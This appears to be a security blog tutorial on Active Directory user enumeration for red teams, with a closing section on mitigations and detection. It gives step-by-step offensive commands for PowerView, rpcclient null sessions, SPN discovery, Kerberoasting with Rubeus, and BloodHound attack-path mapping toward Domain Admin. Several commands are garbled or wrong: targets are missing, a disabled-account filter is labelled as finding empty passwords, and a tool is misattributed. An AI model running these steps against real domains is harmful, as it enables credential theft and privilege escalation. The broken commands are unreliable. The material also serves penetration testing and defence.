Listen to this Post

Introduction:
Active Directory (AD) user enumeration is the reconnaissance bedrock of every red team operation and real-world cyberattack. By systematically discovering domain users, group memberships, and hidden privileges, attackers map the attack surface, identify high‑value targets like Domain Admins, and uncover misconfigurations such as Kerberoastable SPNs or dangerous ACLs – all before firing a single exploit.
Learning Objectives:
- Execute comprehensive AD user enumeration using PowerView, pywerview, and native Windows/Linux tools.
- Identify privileged accounts, SPNs for Kerberoasting, and ACL misconfigurations via LDAP queries and BloodHound.
- Understand attack path mapping from enumeration data to privilege escalation, and apply mitigations to harden AD environments.
You Should Know:
1. Enumerating All Domain Users with PowerView (Windows)
PowerView is a PowerShell tool from the PowerSploit framework that provides deep AD reconnaissance. The `Get-NetUser` cmdlet retrieves every user object, including attributes like samaccountname, pwdLastSet, lastlogon, and `description` (often containing credentials).
Step‑by‑Step Guide:
- Load PowerView: `Import-Module .\PowerView.ps1`
- Enumerate all users: `Get-NetUser | select name, samaccountname, description, pwdlastset, lastlogon`
- Find users with empty passwords: `Get-NetUser -Filter “useraccountcontrol -eq ‘ACCOUNTDISABLE'”`
- Export to CSV: `Get-NetUser | Export-Csv -Path user_enum.csv`
What it does: Queries the domain’s LDAP directory (port 389/TCP) using the current user’s context, returning all user objects. Use it to spot inactive accounts, weak password age, or descriptive text leaks.
2. Linux‑Based User Enumeration Using ldapsearch and rpcclient
On a Linux attack host, you can directly query AD via LDAP or SMB RPC. `ldapsearch` sends authenticated or anonymous binds to retrieve user entries; `rpcclient` uses null sessions (if allowed) to list users.
Step‑by‑Step Guide:
- Install tools: `sudo apt install ldap-utils samba-client`
- Authenticated LDAP enumeration:
`ldapsearch -x -H ldap://-D “CN=user,CN=Users,DC=domain,DC=com” -W -b “DC=domain,DC=com” “(objectClass=user)” samaccountname userprincipalname` - Null session via rpcclient:
`rpcclient -U “” -N ` then inside: `enumdomusers`
- Using
enum4linux: `enum4linux -U`
What it does: `ldapsearch` performs LDAP queries to extract user DNs and attributes; `rpcclient` leverages legacy SMB protocols. Combine with `grep` to filter privileged accounts.
3. Extracting SPNs for Kerberoasting (setspn & PowerView)
Service Principal Names (SPNs) link services to user or computer accounts. Accounts with SPNs (e.g., SQL, HTTP) are Kerberoasting candidates – their password hashes can be cracked offline.
Step‑by‑Step Guide (Windows):
- Using native
setspn: `setspn -T-Q /` lists all SPNs. Focus on user accounts (not computers): `setspn -T -Q / | findstr “^CN=”` - PowerView: `Get-NetUser -SPN | select samaccountname, serviceprincipalname`
- Extract hashes: `Add-Type -AssemblyName System.IdentityModel; New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList “HTTP/websvc.domain.com”` then use `mimikatz` or `Rubeus` to retrieve ticket: `Rubeus.exe kerberoast /outfile:hashes.txt`
What it does: Queries AD for objects with non‑null `servicePrincipalName` attribute. Attackers then request a TGS for that service and crack the RC4_HMAC hash offline.
4. Identifying Privileged Groups and Admin Accounts
Attackers focus on groups like Domain Admins, Enterprise Admins, and Account Operators. Enumerating group members reveals escalation paths.
Step‑by‑Step Guide (Windows/cmd & PowerShell):
- Native cmd:
`net group “Domain Admins” /domain`
`net localgroup “Administrators” /domain`
- PowerView:
`Get-NetGroupMember “Domain Admins”`
`Get-NetLocalGroup -ComputerName ` (remote enumerates local admins)
- Linux via
ldapsearch:
`ldapsearch -x -H ldap://-D “[email protected]” -W -b “DC=domain,DC=com” “(memberOf=CN=Domain Admins,CN=Users,DC=domain,DC=com)” samaccountname`
What it does: Queries group membership recursively. Use it to map admin accounts, then target them with pass‑the‑hash, phishing, or lateral movement.
5. Mapping Attack Paths with BloodHound and SharpHound
BloodHound visualizes AD relationships – user sessions, group memberships, ACLs, and computer ownership. It transforms enumeration data into a graph database, revealing the shortest path to Domain Admin.
Step‑by‑Step Guide (Windows and Linux):
- On Windows (collector): Download SharpHound, run:
`SharpHound.exe -c All –outputdirectory C:\data`
- On Linux: Use `BloodHound.py` from Impacket:
`bloodhound-python -d domain.com -u user -p pass -ns-c all` - Upload generated `.json` files to BloodHound Neo4j database.
- In BloodHound UI: Use pre‑built queries like “Find all Domain Admins” or “Shortest Paths to Domain Admin”.
What it does: SharpHound enumerates user sessions, group policies, and ACLs over LDAP and SMB. BloodHound’s graph analysis highlights attack vectors like “Member of High‑Value Group” or “CanRDP”.
6. Using pywerview for Cross‑Platform User Enumeration
`pywerview` is a Python rewrite of PowerView, ideal for Linux/macOS environments. It leverages Impacket’s SMB and LDAP libraries to execute remote enumeration without any Windows agent.
Step‑by‑Step Guide:
- Install: `git clone https://github.com/the-useless-one/pywerview.git; cd pywerview; pip install -r requirements.txt`
- Enumerate all users:
`python3 pywerview.py get-netuser -u “domain\user” -p “password” -t` - Get group members:
`python3 pywerview.py get-netgroupmember -g “Domain Admins” -u “domain\user” -p “password” -t` - Find SPNs:
`python3 pywerview.py get-netuser -spn -u “domain\user” -p “password” -t`
What it does: Connects to AD via SMB (port 445) or LDAP, mimicking PowerView’s functionality. It’s useful when you need a non‑PowerShell, cross‑platform tool for red team infrastructure.
7. Mitigation Strategies Against User Enumeration
Defenders can limit enumeration by hardening LDAP signing, disabling null sessions, and implementing account lockout policies. However, a determined attacker with a valid domain user credential will always have some enumeration capability – focus on detecting suspicious query patterns.
Step‑by‑Step Mitigation:
- Disable anonymous LDAP queries (Windows Server 2016+ default):
`reg add HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /v RestrictAnonymousLDAP /t REG_DWORD /d 2 /f` - Enable LDAP signing and channel binding: Group Policy → Computer Config → Admin Templates → System → Net Logon → “LDAP server signing requirements” set to “Require signing”.
- Audit enumeration attempts: Enable logging for event IDs 4662 (Directory Service Access) and 4624 (logon). Use Sysmon or UEBA to detect high‑volume LDAP queries from a single source.
- Limit who can query SPNs: Harden service account permissions; use group Managed Service Accounts (gMSA).
What it does: Restricting anonymous binds blocks passive enumeration (e.g.,rpcclient -U ""), while LDAP signing prevents tampering. Active logging helps detect lateral movement preparation.
What Undercode Say:
- User enumeration is not a “noisy” exploit – most AD environments allow LDAP reads by any authenticated user. This makes it a silent, persistent reconnaissance technique.
- Combining PowerView/BloodHound with automatic graph analysis turns raw user lists into actionable attack paths, drastically reducing time to Domain Admin compromise.
Analysis: Modern AD attacks no longer rely on buffer overflows; they abuse native protocols and legitimate queries. Defenders must shift from perimeter blocking to behavioral detection – monitoring for unusual LDAP filters (e.g., `(sAMAccountType=)` queries), excessive `setspn` executions, or sudden BloodHound collector deployments. Red teams should always start with user enumeration: without knowing “who” is in the domain, privilege escalation is blind. The rise of cloud‑synced identities (Azure AD Connect) means enumeration now extends to hybrid environments, where a single on‑prem user enumeration can reveal cloud roles and applications.
Prediction:
As Microsoft pushes pass‑key authentication and token binding, traditional password‑based Kerberoasting may decline, but user enumeration will pivot to OAuth2 and SAML token discovery. Attackers will use enumeration to map service principals, app roles, and federated trust relationships. Automated enumeration bots integrated with LLMs will soon generate natural language attack path reports in real time, forcing a new generation of identity threat detection and response (ITDR) platforms focused on query heuristics rather than signature matching. The future AD attack will not start with a tool – it will start with a single `ldapsearch` and a cleverly crafted filter.
▶️ Related Video (80% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Activedirectory Redteam – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


